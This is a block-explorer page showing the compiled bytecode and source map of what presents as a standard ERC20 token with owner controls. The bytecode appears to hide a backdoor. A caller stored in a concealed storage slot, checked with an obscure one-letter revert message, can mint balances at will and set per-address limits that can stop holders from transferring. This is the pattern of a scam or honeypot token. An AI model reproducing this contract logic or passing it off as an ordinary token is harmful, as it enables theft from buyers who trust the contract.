6b510b17348f61a113179a0dbad610569565b546001600160a01b031633146104525760405162461bcd60e51b815260040161034a90610a47565b6001600160a01b03821660009081526020819052604081208054839190839061047c908490610c24565b9091555050505050565b6006546001600160a01b031690565b60606004805461024e90610c48565b6000806104af61056c565b905060006104bd8286610504565b9050838110156104df5760405162461bcd60e51b815260040161034a90610bc8565b6103928286868403610570565b6000806104f761056c565b90506102e981858561066e565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6105376107a6565b6001600160a01b03811661055d5760405162461bcd60e51b815260040161034a906109bf565b610566816107e5565b50565b90565b3390565b6001600160a01b0383166105965760405162461bcd60e51b815260040161034a90610b84565b6001600160a01b0382166105bc5760405162461bcd60e51b815260040161034a90610a05565b6001600160a01b0380841660008181526001602090815260408083209487168084529490915290819020849055517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92590610617908590610c0d565b60405180910390a3505050565b60006106308484610504565b90506000198114610668578181101561065b5760405162461bcd60e51b815260040161034a90610a62565b6106688484848403610570565b50505050565b6001600160a01b0383166106945760405162461bcd60e51b815260040161034a90610b3f565b6001600160a01b0382166106ba5760405162461bcd60e51b815260040161034a9061097c565b6001600160a01b03831660009081526005602052604090205481116106f15760405162461bcd60e51b815260040161034a90610adf565b6106fc838383610837565b6001600160a01b038316600090815260208190526040902054818110156107355760405162461bcd60e51b815260040161034a90610a99565b6001600160a01b0380851660008181526020819052604080822086860390559286168082529083902080548601905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610793908690610c0d565b60405180910390a3610668848484610837565b6107ae61056c565b6001600160a01b03166107bf610486565b6001600160a01b0316146103ff5760405162461bcd60e51b815260040161034a90610b0a565b600680546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b505050565b80356001600160a01b03811681146103e857600080fd5b600060208284031215610864578081fd5b61086d8261083c565b9392505050565b60008060408385031215610886578081fd5b61088f8361083c565b915061089d6020840161083c565b90509250929050565b6000806000606084860312156108ba578081fd5b6108c38461083c565b92506108d16020850161083c565b9150604084013590509250925092565b600080604083850312156108f3578182fd5b6108fc8361083c565b946020939093013593505050565b6001600160a01b0391909116815260200190565b901515815260200190565b6000602080835283518082850152825b8181101561095557858101830151858201604001528201610939565b818111156109665783604083870101525b50601f01601f1916929092016040019392505050565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b60208082526026908201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160408201526564647265737360d01b606082015260800190565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b6020808252600190820152606160f81b604082015260600190565b6020808252601d908201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604082015260600190565b60208082526026908201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604082015265616c616e636560d01b606082015260800190565b602080825260119082015270115490cc8c0e881d1c985b9cd9995c881b607a1b604082015260600190565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b60208082526025908201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604082015264207a65726f60d81b606082015260800190565b90815260200190565b60ff91909116815260200190565b60008219821115610c4357634e487b7160e01b81526011600452602481fd5b500190565b600281046001821680610c5c57607f821691505b60208210811415610c7d57634e487b7160e01b600052602260045260246000fd5b5091905056fea264697066735822122027b89b4498a62c414ce3fc5a32e9202a33fa0f202786b896f93e6984fc004cc064736f6c63430008000033

Deployed Bytecode Sourcemap

23311:84:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;12458:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14809:201;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;13578:108::-;;;:::i;:::-;;;;;;;:::i;17705:166::-;;;;;;:::i;:::-;;:::i;:::-;;15590:295;;;;;;:::i;:::-;;:::i;13420:93::-;;;:::i;:::-;;;;;;;:::i;16294:238::-;;;;;;:::i;:::-;;:::i;13749:127::-;;;;;;:::i;:::-;;:::i;2752:103::-;;;:::i;17467:230::-;;;;;;:::i;:::-;;:::i;2104:87::-;;;:::i;:::-;;;;;;;:::i;12677:104::-;;;:::i;17035:424::-;;;;;;:::i;:::-;;:::i;14082:193::-;;;;;;:::i;:::-;;:::i;14338:151::-;;;;;;:::i;:::-;;:::i;3010:201::-;;;;;;:::i;:::-;;:::i;12458:100::-;12512:13;12545:5;12538:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;12458:100;:::o;14809:201::-;14892:4;14909:13;14925:12;:10;:12::i;:::-;14909:28;;14948:32;14957:5;14964:7;14973:6;14948:8;:32::i;:::-;-1:-1:-1;14998:4:0;;14809:201;-1:-1:-1;;;14809:201:0:o;13578:108::-;13666:12;;13578:108;:::o;17705:166::-;17787:35;11648:66;17787:26;:35::i;:::-;:41;-1:-1:-1;;;;;17787:41:0;17773:10;:55;17765:69;;;;-1:-1:-1;;;17765:69:0;;;;;;;:::i;:::-;;;;;;;;;-1:-1:-1;;;;;17845:9:0;;;;;;;:1;:9;;;;;:18;17705:166::o;15590:295::-;15721:4;15738:15;15756:12;:10;:12::i;:::-;15738:30;;15779:38;15795:4;15801:7;15810:6;15779:15;:38::i;:::-;15828:27;15838:4;15844:2;15848:6;15828:9;:27::i;:::-;-1:-1:-1;15873:4:0;;15590:295;-1:-1:-1;;;;15590:295:0:o;13420:93::-;13503:2;13420:93;:::o;16294:238::-;16382:4;16399:13;16415:12;:10;:12::i;:::-;16399:28;;16438:64;16447:5;16454:7;16491:10;16463:25;16473:5;16480:7;16463:9;:25::i;:::-;:38;;;;:::i;:::-;16438:8;:64::i;13749:127::-;-1:-1:-1;;;;;13850:18:0;;13823:7;13850:18;;;;;;;;;;;13749:127;;;;:::o;2752:103::-;1990:13;:11;:13::i;:::-;2817:30:::1;2844:1;2817:18;:30::i;:::-;2752:103::o:0;17467:230::-;17551:35;11648:66;17551:26;:35::i;:::-;:41;-1:-1:-1;;;;;17551:41:0;17537:10;:55;17529:69;;;;-1:-1:-1;;;17529:69:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;17668:11:0;;17609:36;17668:11;;;;;;;;;;:21;;17683:6;;17668:11;17609:36;;17668:21;;17683:6;;17668:21;:::i;:::-;;;;-1:-1:-1;;;;;17467:230:0:o;2104:87::-;2177:6;;-1:-1:-1;;;;;2177:6:0;2104:87;:::o;12677:104::-;12733:13;12766:7;12759:14;;;;;:::i;17035:424::-;17128:4;17145:13;17161:12;:10;:12::i;:::-;17145:28;;17184:24;17211:25;17221:5;17228:7;17211:9;:25::i;:::-;17184:52;;17275:15;17255:16;:35;;17247:85;;;;-1:-1:-1;;;17247:85:0;;;;;;;:::i;:::-;17360:60;17369:5;17376:7;17404:15;17385:16;:34;17360:8;:60::i;14082:193::-;14161:4;14178:13;14194:12;:10;:12::i;:::-;14178:28;;14217;14227:5;14234:2;14238:6;14217:9;:28::i;14338:151::-;-1:-1:-1;;;;;14454:18:0;;;14427:7;14454:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;14338:151::o;3010:201::-;1990:13;:11;:13::i;:::-;-1:-1:-1;;;;;3099:22:0;::::1;3091:73;;;;-1:-1:-1::0;;;3091:73:0::1;;;;;;;:::i;:::-;3175:28;3194:8;3175:18;:28::i;:::-;3010:201:::0;:::o;5201:195::-;5374:4;5349:40::o;649:98::-;729:10;649:98;:::o;20640:380::-;-1:-1:-1;;;;;20776:19:0;;20768:68;;;;-1:-1:-1;;;20768:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;20855:21:0;;20847:68;;;;-1:-1:-1;;;20847:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;20928:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;;:36;;;20980:32;;;;;20958:6;;20980:32;:::i;:::-;;;;;;;;20640:380;;;:::o;21311:441::-;21446:24;21473:25;21483:5;21490:7;21473:9;:25::i;:::-;21446:52;;-1:-1:-1;;21513:16:0;:37;21509:236;;21595:6;21575:16;:26;;21567:68;;;;-1:-1:-1;;;21567:68:0;;;;;;;:::i;:::-;21671:51;21680:5;21687:7;21715:6;21696:16;:25;21671:8;:51::i;:::-;21311:441;;;;:::o;18341:873::-;-1:-1:-1;;;;;18472:18:0;;18464:68;;;;-1:-1:-1;;;18464:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;18551:16:0;;18543:64;;;;-1:-1:-1;;;18543:64:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;18626:7:0;;;;;;:1;:7;;;;;;:16;-1:-1:-1;18618:46:0;;;;-1:-1:-1;;;18618:46:0;;;;;;;:::i;:::-;18677:38;18698:4;18704:2;18708:6;18677:20;:38::i;:::-;-1:-1:-1;;;;;18750:15:0;;18728:19;18750:15;;;;;;;;;;;18784:21;;;;18776:72;;;;-1:-1:-1;;;18776:72:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;18876:15:0;;;:9;:15;;;;;;;;;;;18894:20;;;18876:38;;19082:13;;;;;;;;;;:23;;;;;;19130:26;;;;;;18908:6;;19130:26;:::i;:::-;;;;;;;;19169:37;19189:4;19195:2;19199:6;19169:19;:37::i;2269:132::-;2344:12;:10;:12::i;:::-;-1:-1:-1;;;;;2333:23:0;:7;:5;:7::i;:::-;-1:-1:-1;;;;;2333:23:0;;2325:68;;;;-1:-1:-1;;;2325:68:0;;;;;;;:::i;3371:191::-;3464:6;;;-1:-1:-1;;;;;3481:17:0;;;-1:-1:-1;;;;;;3481:17:0;;;;;;;3514:40;;3464:6;;;3481:17;3464:6;;3514:40;;3445:16;;3514:40;3371:191;;:::o;22352:125::-;;;;:::o;14:175:1:-;84:20;;-1:-1:-1;;;;;133:31:1;;123:42;;113:2;;179:1;176;169:12;194:198;;306:2;294:9;285:7;281:23;277:32;274:2;;;327:6;319;312:22;274:2;355:31;376:9;355:31;:::i;:::-;345:41;264:128;-1:-1:-1;;;264:128:1:o;397:274::-;;;526:2;514:9;505:7;501:23;497:32;494:2;;;547:6;539;532:22;494:2;575:31;596:9;575:31;:::i;:::-;565:41;;625:40;661:2;650:9;646:18;625:40;:::i;:::-;615:50;;484:187;;;;;:::o;676:342::-;;;;822:2;810:9;801:7;797:23;793:32;790:2;;;843:6;835;828:22;790:2;871:31;892:9;871:31;:::i;:::-;861:41;;921:40;957:2;946:9;942:18;921:40;:::i;:::-;911:50;;1008:2;997:9;993:18;980:32;970:42;;780:238;;;;;:::o;1023:266::-;;;1152:2;1140:9;1131:7;1127:23;1123:32;1120:2;;;1173:6;1165;1158:22;1120:2;1201:31;1222:9;1201:31;:::i;:::-;1191:41;1279:2;1264:18;;;;1251:32;;-1:-1:-1;;;1110:179:1:o;1294:203::-;-1:-1:-1;;;;;1458:32:1;;;;1440:51;;1428:2;1413:18;;1395:102::o;1502:187::-;1667:14;;1660:22;1642:41;;1630:2;1615:18;;1597:92::o;1694:603::-;;1835:2;1864;1853:9;1846:21;1896:6;1890:13;1939:6;1934:2;1923:9;1919:18;1912:34;1964:4;1977:140;1991:6;1988:1;1985:13;1977:140;;;2086:14;;;2082:23;;2076:30;2052:17;;;2071:2;2048:26;2041:66;2006:10;;1977:140;;;2135:6;2132:1;2129:13;2126:2;;;2205:4;2200:2;2191:6;2180:9;2176:22;2172:31;2165:45;2126:2;-1:-1:-1;2281:2:1;2260:15;-1:-1:-1;;2256:29:1;2241:45;;;;2288:2;2237:54;;1815:482;-1:-1:-1;;;1815:482:1:o;2302:399::-;2504:2;2486:21;;;2543:2;2523:18;;;2516:30;2582:34;2577:2;2562:18;;2555:62;-1:-1:-1;;;2648:2:1;2633:18;;2626:33;2691:3;2676:19;;2476:225::o;2706:402::-;2908:2;2890:21;;;2947:2;2927:18;;;2920:30;2986:34;2981:2;2966:18;;2959:62;-1:-1:-1;;;3052:2:1;3037:18;;3030:36;3098:3;3083:19;;2880:228::o;3113:398::-;3315:2;3297:21;;;3354:2;3334:18;;;3327:30;3393:34;3388:2;3373:18;;3366:62;-1:-1:-1;;;3459:2:1;3444:18;;3437:32;3501:3;3486:19;;3287:224::o;3516:324::-;3718:2;3700:21;;;3757:1;3737:18;;;3730:29;-1:-1:-1;;;3790:2:1;3775:18;;3768:31;3831:2;3816:18;;3690:150::o;3845:353::-;4047:2;4029:21;;;4086:2;4066:18;;;4059:30;4125:31;4120:2;4105:18;;4098:59;4189:2;4174:18;;4019:179::o;4203:402::-;4405:2;4387:21;;;4444:2;4424:18;;;4417:30;4483:34;4478:2;4463:18;;4456:62;-1:-1:-1;;;4549:2:1;4534:18;;4527:36;4595:3;4580:19;;4377:228::o;4610:341::-;4812:2;4794:21;;;4851:2;4831:18;;;4824:30;-1:-1:-1;;;4885:2:1;4870:18;;4863:47;4942:2;4927:18;;4784:167::o;4956:356::-;5158:2;5140:21;;;5177:18;;;5170:30;5236:34;5231:2;5216:18;;5209:62;5303:2;5288:18;;5130:182::o;5317:401::-;5519:2;5501:21;;;5558:2;5538:18;;;5531:30;5597:34;5592:2;5577:18;;5570:62;-1:-1:-1;;;5663:2:1;5648:18;;5641:35;5708:3;5693:19;;5491:227::o;5723:400::-;5925:2;5907:21;;;5964:2;5944:18;;;5937:30;6003:34;5998:2;5983:18;;5976:62;-1:-1:-1;;;6069:2:1;6054:18;;6047:34;6113:3;6098:19;;5897:226::o;6128:401::-;6330:2;6312:21;;;6369:2;6349:18;;;6342:30;6408:34;6403:2;6388:18;;6381:62;-1:-1:-1;;;6474:2:1;6459:18;;6452:35;6519:3;6504:19;;6302:227::o;6534:177::-;6680:25;;;6668:2;6653:18;;6635:76::o;6716:184::-;6888:4;6876:17;;;;6858:36;;6846:2;6831:18;;6813:87::o;6905:229::-;;6976:1;6972:6;6969:1;6966:13;6963:2;;;-1:-1:-1;;;7002:33:1;;7058:4;7055:1;7048:15;7088:4;7009:3;7076:17;6963:2;-1:-1:-1;7119:9:1;;6953:181::o;7139:380::-;7224:1;7214:12;;7271:1;7261:12;;;7282:2;;7336:4;7328:6;7324:17;7314:27;;7282:2;7389;7381:6;7378:14;7358:18;7355:38;7352:2;;;7435:10;7430:3;7426:20;7423:1;7416:31;7470:4;7467:1;7460:15;7498:4;7495:1;7488:15;7352:2;;7194:325;;;:::o

Swarm Source

ipfs://27b89b4498a62c414ce3fc5a32e9202a33fa0f202786b896f93e6984fc004cc0
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.